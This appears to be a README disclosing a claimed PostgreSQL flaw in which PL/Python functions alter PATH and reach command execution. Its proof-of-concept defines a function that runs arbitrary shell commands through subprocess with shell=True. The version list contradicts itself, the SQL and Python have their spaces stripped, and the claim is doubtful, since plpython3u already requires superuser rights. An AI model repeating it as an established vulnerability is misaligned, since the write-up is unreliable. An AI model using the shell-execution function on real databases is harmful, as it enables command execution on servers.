This repository documents a vulnerability identified in PostgreSQL versions 16.3, 17.1 and 17.2 that allows for unauthorized manipulation of environment variables using PL/Python functions. This issue can lead to unauthorized command execution, privilege escalation, and other potential security impacts.
Affected Products/Versions
Product: PostgreSQL
Versions Affected: 16.3, 17.1
Proof-of-Concept (PoC)
Steps to Reproduce
Connect to the PostgreSQL database as a user with permissions to create functions.
psql-U [username] -d [database_name]
Create a PL/Python function to modify the PATH environment variable:
CREATEFUNCTIONtest_env_python()RETURNSvoidAS$$importosos.environ['PATH']='/tmp/test_bin:'+os.environ['PATH']$$ LANGUAGE plpython3u;
Verify the change by creating a custom script in /tmp/test_bin and executing it through PostgreSQL. Create the script:
CREATEFUNCTIONrun_shell_command(cmdTEXT)RETURNSvoidAS$$importsubprocesssubprocess.run(cmd,shell=True)$$ LANGUAGE plpython3u;SELECTrun_shell_command('ls');
Expected Outcome
The custom ls script in /tmp/test_bin is executed, demonstrating that environment variable manipulation allows for custom command execution.
Impact
This vulnerability enables:
Unauthorized Code Execution: An attacker with permissions to create functions may modify the environment and execute arbitrary commands. Privilege Escalation: Depending on the privileges of the PostgreSQL user, an attacker may gain higher-level access or control over the underlying server.
Suggested Mitigations
-Restrict Permissions: Limit the creation of PL/Python and PL/Perl functions to trusted users only. -Environment Variable Sanitization: Ensure that environment variables are properly sanitized and modifications are restricted. -Upgrade PostgreSQL: If a fix is released by the PostgreSQL Global Development Group, update to the latest version. -Audit Database Functions: Regularly audit user-created functions to detect and prevent potential exploitation.